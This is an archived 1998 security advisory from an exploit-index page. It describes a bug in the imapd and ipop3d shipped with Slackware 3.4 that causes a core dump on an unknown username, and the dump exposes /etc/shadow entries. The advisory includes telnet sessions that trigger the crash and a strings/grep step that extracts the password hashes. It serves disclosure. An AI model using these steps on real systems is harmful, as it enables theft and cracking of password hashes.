Coredump hole in imapd and ipop3d in slackware 3.4

Description:When fed an unknown username, imapd and ipop3d will dump core in Slackware 3.4. /etc/shadow can be found in the core file.
Author:Peter van Dijk <peter@ATTIC.VUURWERK.NL>
Compromise:Learn the contents of /etc/shadow (which would allow you to crack the passwords and break into other accounts)
Vulnerable Systems:Slackware Linux 3.4 and the imapd in 3.3. possibly others
Date:2 February 1998

Date: Mon, 2 Feb 1998 00:08:17 +0100
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
Subject: imapd/ipop3d coredump in slackware 3.4

[attic bug report nr. 1]

While fooling around a little with NIS/YP (didn't get it completely
working...) I ran into a bug in the imapd and ipop3d that come with
slackware 3.4 (if you install the pine package).
Earlier slackware versions will problably NOT suffer from this bug,
because they did not include shadowing.

When fed an unknown username, imapd and ipop3d will dump core:

[root@koek] /# telnet zopie 110
Connected to
Escape character is '^]'.
+OK POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.

At this point ipop3d coredumps in /core:

[root@zopie] /# strings core | grep -A3 root
[crypted pw here]

Sun Feb  1 23:45:15 1998
root:[crypted pw here]:10244:0:::::
[looks like my /etc/shadow ;(]
root:[crypted pw here]:10244:0:::::

[I removed the pw because it's my own ;)]

Same goes for imapd:
Connected to
* OK IMAP2bis Service 7.8(100) at Sun, 1 Feb 1998 23:53:00 +0100 (CET)
A001 LOGIN root linux
A001 NO Bad LOGIN user name and/or password
A002 LOGIN john doe
Connection closed by foreign host.

Doing the strings/grep again gives about the same result.

Running this under strace shows that the program reads /etc/passwd and
closes it again, then reopens it (to try the username in lowercase) and
reads again, followed by a SIGSEGV.

The bug is in (one of) the patches and diffs that are applied to
support shadowing in Linux. The problem is in log_lnx.c.diff.gz:
-  if (!(pw && pw->pw_uid)) return NIL;
+/*  if (!(pw && pw->pw_uid)) return NIL; */

I have no idea why this check is removed (the programs continue to keep
working with this check enabled), but it breaks the whole thing.
A couple more patches are applied, after which 'build lnx' is executed.
Apparently Patrick Volkerding (maintainer of SlackWare, real cool guy I
think) didn't realize that 'build slx' does about the same, only safe...

Note that the dumped core is mode 600, _unless_ /core already exists, in
which case it's permissions are retained.

Greetz, Peter.

P.S. Does anybody know where a process like ipop3d leaves it's coredumps
_after_ the user has logged in, so that it's running under the users' id?

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: